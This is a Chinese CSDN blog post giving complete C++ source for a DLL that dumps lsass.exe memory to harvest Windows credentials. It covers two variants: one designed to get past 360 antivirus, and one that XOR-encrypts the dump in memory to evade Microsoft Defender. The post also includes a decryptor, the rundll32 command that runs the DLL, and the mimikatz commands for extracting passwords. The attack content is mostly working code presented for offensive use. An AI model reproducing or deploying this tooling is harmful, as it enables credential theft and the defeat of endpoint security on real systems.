Mimikatz免杀实战:绕过360核晶和defender

已于 2023-08-22 23:12:50 修改
阅读量2.5k 收藏 3
点赞数 1
分类专栏: 免杀实战 文章标签: 网络安全 网络 安全 网络攻击模型 系统安全
于 2023-08-22 23:12:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/132439090
版权

文章目录

前言

通常来说,即使我们成功实现了mimikatz的静态免杀,其抓取hash的行为仍可能会被防病毒软件检测到虽然你可以通过修改mimikatz的源码来实现行为上的免杀,但这需要花费大量的时间。我建议针对具体功能的代码来实现免杀,例如,mimikatz的dump hash功能主要依赖于Windows API的Minidump函数。

绕过360核晶

实现思路

1.设置权限

为了能够访问 lsass.exe 进程的内存,代码首先检查并提升程序的权限。这是通过 CheckPrivilege()EnableDebugPrivilege() 函数完成的

2.获取lsass进程的pid

代码使用 GetLsassPID() 函数获取 lsass.exe 进程的进程ID (PID)

3.创建内存转储文件

代码最主要的部分是 Dump() 函数,这个函数使用了 MiniDumpW 函数来创建 lsass.exe 进程的内存转储文件。

MiniDump函数是comsvcs.dll库中的一个函数,通常被用于生成进程的堆栈跟踪信息,在Windows中,MiniDump可以生成一个包含线程和句柄信息以及可选内存信息的dump文件,函数的使用需传入一个包含进程ID和转储文件路径的字符串参数

完整代码

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <TlHelp32.h>
#pragma comment( lib, "Dbghelp.lib" )
#define _CRT_SECURE_NO_WARNINGS


// comsvcs.dll 中 MiniDumpW 函数的类型定义
typedef HRESULT(WINAPI* _MiniDumpW)(DWORD , DWORD , PWCHAR );


// 检查是否具有管理员权限
BOOL CheckPrivilege() 
{
    BOOL state;
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    PSID AdministratorsGroup;

    state = AllocateAndInitializeSid(
        &NtAuthority,
        2,
        SECURITY_BUILTIN_DOMAIN_RID,
        DOMAIN_ALIAS_RID_ADMINS,
        SECURITY_LOCAL_SYSTEM_RID, DOMAIN_GROUP_RID_ADMINS, 0, 0, 0, 0,
        &AdministratorsGroup);

    if (state)
    {
        if (!CheckTokenMembership(NULL, AdministratorsGroup, &state))
        {
            state = FALSE;
        }
        FreeSid(AdministratorsGroup);
    }

    return state;
}

// 启用调试权限
BOOL EnableDebugPrivilege()
{
    HANDLE hThis = GetCurrentProcess();
    HANDLE hToken;
    OpenProcessToken(hThis, TOKEN_ADJUST_PRIVILEGES, &hToken);
    LUID luid;
    LookupPrivilegeValue(0, TEXT("seDebugPrivilege"), &luid);
    TOKEN_PRIVILEGES priv;
    priv.PrivilegeCount = 1;
    priv.Privileges[0].Luid = luid;
    priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    BOOL isEnabiled = AdjustTokenPrivileges(hToken, false, &priv, sizeof(priv), 0, 0);
    if (isEnabiled) {
        CloseHandle(hToken);
        CloseHandle(hThis);
        return TRUE;
    }
    return FALSE;
}

// 获取 lsass 进程的 PID
DWORD GetLsassPID() 
{
    DWORD lsassPID = 0;
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 processEntry = {};
    processEntry.dwSize = sizeof(PROCESSENTRY32);
    LPCWSTR processName = L"";

    if (Process32First(snapshot, &processEntry)) 
    {
        while (_wcsicmp(processName, L"lsass.exe") != 0) 
        {
            Process32Next(snapshot, &processEntry);
            processName = processEntry.szExeFile;
            lsassPID = processEntry.th32ProcessID;
        }
    }
    return lsassPID;
}

// 检查指定文件是否存在
BOOL CheckFileExists(PWCHAR file) 
{
    WIN32_FIND_DATA FindFileData;
    HANDLE hFind = FindFirstFileEx(file, FindExInfoStandard, &FindFileData, FindExSearchNameMatch, NULL, 0);
    if (hFind == INVALID_HANDLE_VALUE)
    {
        return FALSE;
    }
    return TRUE;
}

int Dump() 
{
    WCHAR commandLine[MAX_PATH]; //命令行参数
    WCHAR DumpFile[] = L"C:\\Windows\\Temp\\test.log"; //转储文件的路径
    _MiniDumpW MiniDumpW; //MiniDumpW 函数的指针
    DWORD lsassPID = 0;  //存放lsass进程的PID

    // 检查是否具有管理员权限
    if (!CheckPrivilege()) 
	{
        return -1;
    }
    
    // 启用调试权限
    if (!EnableDebugPrivilege()) 
	{
        return -1;
    }

    // 获取lsass进程的PID
    lsassPID = GetLsassPID();

    // 获取 MiniDumpW 函数的地址
    MiniDumpW = (_MiniDumpW)GetProcAddress(LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
    
    // 准备MiniDumpWh函数的参数,full是传递给MiniDumpW函数的参数之一,表示创建一个完整的内存转储
    swprintf(commandLine, 512, L"%d %s full", lsassPID, DumpFile);

    // 调用 MiniDumpW 函数创建内存转储文件
    MiniDumpW(0, 0, commandLine);
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, 
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        Dump();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

运行测试

将生成的dll文件配合rundll.exe执行:rundll32 DumpHash.dll dllmain(其实我更偏向使用白+黑来执行dll文件)

在此过程中360核晶并没有拦截,执行完毕后会在Windows/temp目录生成test.log(此文件就是lsass进程的dump文件)

在Windows系统中,rundll32.exe是一个重要的系统工具,用于加载和执行动态链接库(DLL)中的函数

image-20230716203413832

将test.log拖到本机使用mimikatz执行如下命令导出目标主机的密码:

  • sekurlsa::minidump test.log:mimikatz将只从指定的内存转储文件test.log中读取数据,而不再直接从LSASS进程中读取数据
  • sekurlsa::logonpasswords full:从LSASS进程中提取登录密码的,full参数表示将尽可能多地显示关于登录会话和密码的信息
image-20230716195338534

绕过WD

实现思路

上述这种方法无法绕过WindowsDefender,因为defender对生成的dump文件检验比较严格,只要发现你这个dump文件是lsass进程的,立马就会查杀,当然也有方法去绕过,只需对dump的文件进行加密。

当然对dump文件加密也是有前提的,需要在dump文件没有写入磁盘前对其里面的数据加密,这样才能绕过Defender,代码的实现重点关注两个函数,分别是MiniDumpWriteDump和它的回调函数

image-20230716205829732

MiniDumpWriteDump

MiniDumpWriteDump 是一个 Windows API 函数,此函数在Dbghelp.dll 库中定义,可以创建一个指定进程的内存转储文件(通常称为 “minidump” 文件)

以下是 MiniDumpWriteDump 函数的原型:

cppCopy codeBOOL MiniDumpWriteDump(
  HANDLE hProcess, //一个打开的句柄,指向需要创建内存转储文件的进程
  DWORD ProcessId, //需要创建内存转储文件的进程的进程ID
  HANDLE hFile, //一个打开的句柄,指向用于写入内存转储文件的文件,可置NULL
  MINIDUMP_TYPE DumpType, //一个 MINIDUMP_TYPE 枚举值,指定内存转储文件的类型
  PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,  //置NULL
  PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, //置NULL
  PMINIDUMP_CALLBACK_INFORMATION CallbackParam  //一个指向 MINIDUMP_CALLBACK_INFORMATION 结构的指针,这个结构包含了一个回调函数和一个用户定义的参数。在内存转储过程中,这个回调函数会被多次调用,可以用于控制转储的过程或修改转储的内容。如果不需要使用回调函数,这个参数可以为 NULL
);

回调函数加密dump文件

MiniDumpWriteDump函数有一个回调函数, 可以通过callbackInput->CallbackType来判断何时回调执行我们自定义的代码段

首先在loStartCallback中将status成员设置为S_FALSE, 其目的是在开始写入数据时,不会将数据写入磁盘;然后在IoWriteAllCallback中将status成员设置为S_OK, 其目的是在每次写入数据时,将其写入到申请的堆内存中, 这样方便后续的xor加密操作

这种数据的加密是在内存中执行的,而不是在文件中执行,因此能够绕过Defender的检测

BOOL CALLBACK minidumpCallback(
    __in     PVOID callbackParam,
    __in     const PMINIDUMP_CALLBACK_INPUT callbackInput,
    __inout  PMINIDUMP_CALLBACK_OUTPUT callbackOutput
)
{
    LPVOID destination = 0, source = 0;
    DWORD bufferSize = 0;

    switch (callbackInput->CallbackType)
    {
    case IoStartCallback:
        // 在开始写入数据时,设置 Status 为 S_FALSE,这可能会取消默认的写入操作
        callbackOutput->Status = S_FALSE;
        break;

    case IoWriteAllCallback:
        // 在每次写入数据时,将数据保存到预先分配的内存区域

        // 设置 Status 为 S_OK,这可能会取消默认的写入操作
        callbackOutput->Status = S_OK;

        // source 指向一块刚刚从 lsass 进程读取的内存数据,这块数据将会被写入到内存转储文件中
        source = callbackInput->Io.Buffer;

        // destination 是我们想要保存这部分数据的位置,计算方法是 dumpBuffer 的开始地址加上这块数据在内存转储文件中的偏移量
        destination = (LPVOID)((DWORD_PTR)buffer + (DWORD_PTR)callbackInput->Io.Offset);

        // bufferSize 是刚刚读取的内存数据的大小
        bufferSize = callbackInput->Io.BufferBytes;

        // 将内存数据从 source 复制到 destination
        RtlCopyMemory(destination, source, bufferSize);

        break;

    case IoFinishCallback:
        // 在完成写入数据时,设置 Status 为 S_OK
        callbackOutput->Status = S_OK;
        break;

    default:
        return true;
    }
    return TRUE;
}

完整代码

以下是绕过WD的dumphash代码:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <TlHelp32.h>
#pragma comment( lib, "Dbghelp.lib" )
#include <fstream>
#define _CRT_SECURE_NO_WARNINGS

// MiniDumpWriteDump 函数的类型定义
typedef BOOL(WINAPI* _MiniDumpWriteDump)(
    HANDLE hProcess, DWORD ProcessId,
    HANDLE hFile, MINIDUMP_TYPE DumpType,
    PMINIDUMP_EXCEPTION_INFORMATION   ExceptionParam,
    PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
    PMINIDUMP_CALLBACK_INFORMATION CallbackParam);
_MiniDumpWriteDump MMiniDumpWriteDump = (_MiniDumpWriteDump)GetProcAddress(
// 加载 Dbghelp.dll 并获取 MiniDumpWriteDump 函数的地址    
LoadLibraryA("Dbghelp.dll"), "MiniDumpWriteDump");

// 为内存转储分配一个 75MB 的内存区域
LPVOID buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024 * 1024 * 75);
DWORD bytesRead = 0;
DWORD bytesWritten = 0;


// 检查是否具有管理员权限
BOOL CheckPrivilege() 
{
    BOOL state;
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    PSID AdministratorsGroup;

    state = AllocateAndInitializeSid(
        &NtAuthority,
        2,
        SECURITY_BUILTIN_DOMAIN_RID,
        DOMAIN_ALIAS_RID_ADMINS,
        SECURITY_LOCAL_SYSTEM_RID, DOMAIN_GROUP_RID_ADMINS, 0, 0, 0, 0,
        &AdministratorsGroup);

    if (state)
    {
        if (!CheckTokenMembership(NULL, AdministratorsGroup, &state))
        {
            state = FALSE;
        }
        FreeSid(AdministratorsGroup);
    }

    return state;
}

// 启用调试权限
BOOL EnableDebugPrivilege()
{
    HANDLE hThis = GetCurrentProcess();
    HANDLE hToken;
    OpenProcessToken(hThis, TOKEN_ADJUST_PRIVILEGES, &hToken);
    LUID luid;
    LookupPrivilegeValue(0, TEXT("seDebugPrivilege"), &luid);
    TOKEN_PRIVILEGES priv;
    priv.PrivilegeCount = 1;
    priv.Privileges[0].Luid = luid;
    priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    BOOL isEnabiled = AdjustTokenPrivileges(hToken, false, &priv, sizeof(priv), 0, 0);
    if (isEnabiled) {
        CloseHandle(hToken);
        CloseHandle(hThis);
        return TRUE;
    }
    return FALSE;
}

// 获取 lsass 进程的 PID
DWORD GetLsassPID() 
{
    DWORD lsassPID = 0;
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 processEntry = {};
    processEntry.dwSize = sizeof(PROCESSENTRY32);
    LPCWSTR processName = L"";

    if (Process32First(snapshot, &processEntry)) 
    {
        while (_wcsicmp(processName, L"lsass.exe") != 0) 
        {
            Process32Next(snapshot, &processEntry);
            processName = processEntry.szExeFile;
            lsassPID = processEntry.th32ProcessID;
        }
    }
    return lsassPID;
}


BOOL CALLBACK minidumpCallback(
    __in     PVOID callbackParam,
    __in     const PMINIDUMP_CALLBACK_INPUT callbackInput,
    __inout  PMINIDUMP_CALLBACK_OUTPUT callbackOutput
)
{   
    // 定义目标和源的内存地址以及缓冲区大小
    LPVOID destination = 0, source = 0;
    DWORD bufferSize = 0;

    // 根据回调类型进行不同的处理
    switch (callbackInput->CallbackType)
    {
        
    case IoStartCallback:
        
        // 在内存转储开始时,将状态设置为 S_FALSE
        // 即取消默认的写入操作,数据将不会写入文件中
        callbackOutput->Status = S_FALSE;
        break;

        
    case IoWriteAllCallback:
        // 在每次写入数据时,将状态设置为S_OK
        // 即通过自定义的方式来处理数据
        callbackOutput->Status = S_OK;

        // 保存刚刚从 lsass 进程读取的内存数据的地址
        source = callbackInput->Io.Buffer;

        // 计算数据应存储的位置,该位置是预先分配的缓冲区的开始地址加上该数据在内存转储文件中的偏移量
        destination = (LPVOID)((DWORD_PTR)buffer + (DWORD_PTR)callbackInput->Io.Offset);

        // 保存刚刚读取的内存数据的大小
        bufferSize = callbackInput->Io.BufferBytes;
        bytesRead += bufferSize;

        // 将数据从源地址复制到目标地址
        RtlCopyMemory(destination, source, bufferSize);

        break;

    case IoFinishCallback:
        // 当内存转储完成时,将状态设置为 S_OK
        callbackOutput->Status = S_OK;
        break;

    default:
        return true;
    }
    return TRUE;
}

// Xor加密函数
char* Xorcrypt(char* content, DWORD length, char* secretKey)
{
    for (UINT i = 0; i < length; i++)
    {
        content[i] ^= secretKey[i % sizeof(secretKey)];
    }

    return content;
}


int Dump() 
{   

    DWORD lsassPID = 0;  //存放lsass进程的PID
    HANDLE lHandle = NULL;

    // 检查是否具有管理员权限
    if (!CheckPrivilege()) 
	{
        return -1;
    }
    
    // 启用调试权限
    if (!EnableDebugPrivilege()) 
	{
        return -1;
    }

    // 获取lsass进程的PID
    lsassPID = GetLsassPID();
    
    // 打开 lsass.exe 进程,并获取进程句柄
    lHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, lsassPID);

    //设置回调函数的参数,这里的回调函数是minidumpCallback
    MINIDUMP_CALLBACK_INFORMATION callbackInfo;
    ZeroMemory(&callbackInfo, sizeof(MINIDUMP_CALLBACK_INFORMATION));
    callbackInfo.CallbackRoutine = &minidumpCallback;
    callbackInfo.CallbackParam = NULL;
    
    //调用MiniDumpWriteDump函数获取内存转储
    BOOL isD = MMiniDumpWriteDump(lHandle, lsassPID, NULL, MiniDumpWithFullMemory, NULL, NULL, &callbackInfo);
    if (isD)
    {   
        // 对存放在堆内存中的数据进行xor加密
        long int size = bytesRead;
        char* securitySth = new char[size];
        char* key = (char*)"thisisgood";
        memcpy(securitySth, buffer, bytesRead);
        securitySth = Xorcrypt(securitySth, bytesRead, key);

        // 创建内存存储文件
        HANDLE outFile = CreateFile(L"C:\\Windows\\Temp\\test.log", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

        // 将xor加密后的数据写入存储文件中
        if (WriteFile(outFile, securitySth, bytesRead, &bytesWritten, NULL))
        {   

            //printf("\n[+] to C:\\Windows\\Temp\\test.log\n");
        }

        CloseHandle(outFile);
    }

    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, 
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        Dump();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

以下是使用xor解密dump文件的代码:

#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
    char fBuffer[1];  // 文件缓冲区
    int index = 0;  // 索引,用于按循环方式获取密钥
    char* key = (char*)"thisisgood";  // 密钥
    int keylen = sizeof(key);  // 获取密钥长度

    // 检查参数数量是否正确
    if (argc != 3) {
        printf("Usage: %s <source> <destination>\n", argv[0]);
        return 1;
    }

    // 以二进制读取模式打开源文件
    FILE* fSource = fopen(argv[1], "rb");
    if (fSource == NULL) {
        perror("Error opening source file");
        return 1;
    }

    // 以二进制写入模式打开目标文件
    FILE* fDest = fopen(argv[2], "wb");
    if (fDest == NULL) {
        perror("Error opening destination file");
        return 1;
    }

    // 循环读取源文件的每个字节,执行XOR操作并写入目标文件
    while (fread(fBuffer, 1, 1, fSource) == 1) {
        fBuffer[0] ^= key[index % keylen];  // 对读取的字节执行XOR操作
        fwrite(fBuffer, 1, 1, fDest);  // 将结果写入目标文件
        index++;  // 更新索引
    }

    // 关闭文件
    fclose(fSource);
    fclose(fDest);

    return 0;  // 
}

运行测试

运行方法和之前的差不多,只是多了个解密的步骤,需将dump后的文件进行xor解密后,然后再放到mimikatz读取密码

.\Xor解密文件.exe .\test.log 1.bin
image-20230717173133038

参考文章

  • https://tttang.com/archive/1810/#toc_silentprocessexitdump

  • https://xz.aliyun.com/t/11199#toc-5

Henry404s
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
360的自启动代码(最新测试)
07-13
这是一个可以过360的代码例子 大家可以下载下来看看
GimmeTheFile:绕过公司Web代理过滤和防病毒的概念证明
05-04
Gimme文件 作者:Arno0x0x- ://twitter.com/Arno0x0x 表中的内容 执照 项目的成因 屏幕截图 服务器端依赖性 使用方法/运作方式 给Apache用户的注意事项 给Nginx用户的注释 待办事项清单 学分 执照 此应用是根据GPLv3许可的条款分发的,可在此处获得: : 项目的成因 我开始进行该项目的研究是关于如何绕过我一直在那里遇到的具有防病毒功能的某些公司http代理的研究。 我经常必须下载一些在公司环境中被认为有害或不需要的二进制文件(足够公平):诸如“ Cain&Abel”,“ Mimikatz”等之类的东西,或者只是用于执行工作站防病毒测试的“ Eicar”之类的东西。 这样,这些二进制文件会被代理和/或代理防病毒阻止。 根据我的经验,使用一些标准的Web代理(Glype,Google App Engine上的labnol python代
2014.7月最新面杀mimikatz 2.0
07-10
2014年7月最新免杀mimikatz 2.0,过世界主流杀毒软件 支持windows 2008 R2和windows 2012
mimikatz-en:gentilkiwi 早期 mimikatz 版本的英文翻译
07-04
模仿园 这是的英语本地化。 Mimikatz 使用 Windows 上的管理员权限以明文形式显示当前登录用户的密码。 Mimikatz 是由 Benjamin “gentilkiwi” Delpy 编写的。 特别是,该工具与结合使用时非常有用。 Netview 是一个网络扫描器,能够显示活动的 RDP 连接,帮助指出当前有多个网络用户登录的系统。这些是权限提升后 mimikatz-en 的良好目标。 Netview 由 Rob "mubix" Fuller 发布。 中 r46 代码的翻译首先使用 Google Translate 完成,然后由 Rich Rumble 进行编辑。 我对 r47 做了一个差异/补丁并进一步编辑。 通常,我不对任何恶意使用此工具负责,我希望发布它及其源代码为整个社区带来更好的信息安全。 模仿 此存储库包含源代码。 可以使用不同源代码的摘录: : 此实用程
AppInitGlobalHooks-Mimikatz:从流程列表中隐藏Mimikatz
05-22
AppInitGlobalHooks-Mimikatz 从流程列表中隐藏Mimikatz 改编自此: : display=Print 更新到x64,并将Calc.exe更改为Mimikatz.exe
免杀mimikatz源码+特征码
zhangshuaiijie的博客
06-23 1665
关于免杀网络上的信息对新手来说相对少很多,不是看不懂就是压根不能用,这也算是一个记录吧,我也不敢保证能不能成功。
免杀方法(一)mimikazta
qq_56426046的博客
10-03 2486
—————————————————————————————————————————————————————————————为什么要难过,一直微笑就好啦。Mimikazta是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取。我们可以通过github上的开源代码对其进行源码免杀从而bypass反病毒软件。明文密码和NTLM哈希值的工具,攻击者可以借此漫游内网。源码免杀也是基于特征码的一种免杀方式,只需要定位源码中的特征代码进。行修改就可以达到免杀效果。查找替换关键字mimikatz
mimikatz免杀360和火绒
qq_44905657的博客
12-28 2038
mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网。也可以通过明文密码或者hash值进行提权。这款工具机器出名所以被查杀的几率极高。 1、免杀方式 对mimikatz我们进行源码免杀。源码免杀只需要定位源码中的特征代码进行修改就可以达到预期的免杀效果。一般的定位特征码分为三种:定位倒代码上,定位到字符串上,定位到输入表上。 2、免杀处理 我们访问https://github.com/genti
mimikatz免杀手段来绕过杀软的限制
热门推荐
LiBai'S BLOG
11-12 5万+
在内网渗透过程中,我们常常需要利用mimikatz工具dump出lsass进程来获取明文密码或者hash。但是一般杀软对mimikatz的查杀比较严,对lsass进程的管控也很严格。所以我们需要用到一些免杀手段来绕过杀软的限制,方法网上特别多,下面讲讲我自己实践过的几种。
Mimikatz的18种免杀姿势及防御策略
Xor0ne
05-01 7069
PS:建议 :win10慎用,唉,伤心 然后按照里面的的步骤一步步去执行,有很多错误,所以如果您只是看技巧的话,可以去原文查看哦。或者读的时候略过我的错误部分啦。>_< 免杀介绍中方法【1-10】转载于自于: Mimikatz的18种免杀姿势及防御策略(上) 文章目录0x01前言0x02免杀介绍方法0-原生态mimikatz.exe(VT查杀率55/71)方法1-加壳+签名+资源替换(...
2020.06-Mimikatz的18种免杀姿势及防御策略1
08-03
2020.06-Mimikatz的18种免杀姿势及防御策略1
安全研发----使用pe_to_shellcode免杀mimikatz
SHELLCODE_8BIT的博客
10-28 2641
前言 mimikatz是一款大量使用的项目,我们在实战中经常会用到它来抓取目标密码,而由于项目中大量实战导致杀软查杀非常严重,我们来看看现在的mimikatz编译出来的查杀情况。在该项目中我们会学习到一个叫pe_to_shellcode的项目,直接能够将pe转换成shellcode,可以简易的将pe使用内存加载避开特征文件落地。 一.下载和编译mimikatz 首先从https://github.com/gentilmimikatz下载mimikatz 二.去掉mimikatz大部分特征 1.
最新免杀!可过360核晶Defender(SysWhispers3)
潇湘信安的博客
05-19 1263
SysWhispers3WinHttp 基于SysWhispers3项目增添WinHttp分离加载功能,目前还可免杀绕过360核晶Defender
计划任务绕过360核晶自启动 c++
qq_37561898的博客
06-25 2699
绕过360核晶实现计划任务开机自启(带bypass uac)
实用cs、mimikatz免杀virscan
xxx9686的博客
09-17 1854
第一步:替换资源,此步骤可以直接免杀360及电脑管家,但是无法过火绒。使用Restorator加载mimikatz后在拖入其他程序资源(此处需要注意,资源需要无毒,资源越好效果越佳。sigthief.py -i 软件文件名 -t 木马文件名 -o 输出位置(此处由于软件从虚拟机中考出有问题,无图)。替换版本及图标资源后,需要给软件上数字签名(正儿八经的软件签名我们没有,可以copy别的软件做伪签名)。简单过360,但是资源未过火绒,在此基础上我们给他添加一个壳即可,任意壳,我们添加vm壳。
Mimikatz源码免杀
LainWith的博客
01-04 4790
目录介绍环境准备处理报错生成32位生成64位下载360360杀毒直接查杀关键字替换-失败去除注释,修改版本信息删除注释信息替换图标修改版本信息重新编译文件过杀软360家族腾讯电脑管家火绒在线查杀参考 学习一下月师傅的文章 介绍 Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的工具,攻击者可以借此漫游内网。也可以通过明文密码或者传递hash值来提权。因为这款工具特别出名所以被查杀的机率很大,我们可以通过github上的开源代码对其进行源码免
几种免杀转储lsass进程的技巧
chenfeng857的博客
09-06 2888
在内网渗透进行横向移动和权限提升时,最常用的方法是通过dump进程lsass.exe,从中获得明文口令或者hash。lsass.exe(Local Security Authority Subsystem Service)是一个系统进程,用于微软Windows系统的安全机制,它用于本地安全和登陆策略。在进程空间中,存有着机器的域、本地用户名和密码等重要信息。但是需要首先获得一个高的权限才能对其进行访问。 在存在杀软防护的情况下,要想转储lsass进程,我首先想到的是procdump+Mimikatz 的方式
【经验小谈】androidx86虚拟机跟intel-vt冲突 android x86虚拟机跟360核晶功能冲突 android x86虚拟机开启失败 android x86虚拟机黑屏
Buider_Wonderful的专栏
06-10 3781
如题:androidx86虚拟机跟intel-vt冲突  android x86虚拟机跟360核晶功能冲突 android x86虚拟机开启失败 android x86虚拟机黑屏 遇到了这些问题先确认 1、电脑是不是win7/win8系统 2、电脑是不是6
** Failed to import volatility.plugins.mimikatz (AttributeError: 'module' object has no attribute 'ULInt32')
最新发布
08-14
这个错误可能是由于您使用的 Volatility 版本与所需的插件不兼容导致的。请确保您正在使用与 mimikatz 插件兼容的版本。您可以尝试更新或降级 Volatility 版本,或者查看是否有其他可用的插件版本可以解决此问题。另外,还建议检查您的 Python 环境和依赖项是否正确安装。如果问题仍然存在,请提供更多详细的错误信息,以便我可以更好地帮助您解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值